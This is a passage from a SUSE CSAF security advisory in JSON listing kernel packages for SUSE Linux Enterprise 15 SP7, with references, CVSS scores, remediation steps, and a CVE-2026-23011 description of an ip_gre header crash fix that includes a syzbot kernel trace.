"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
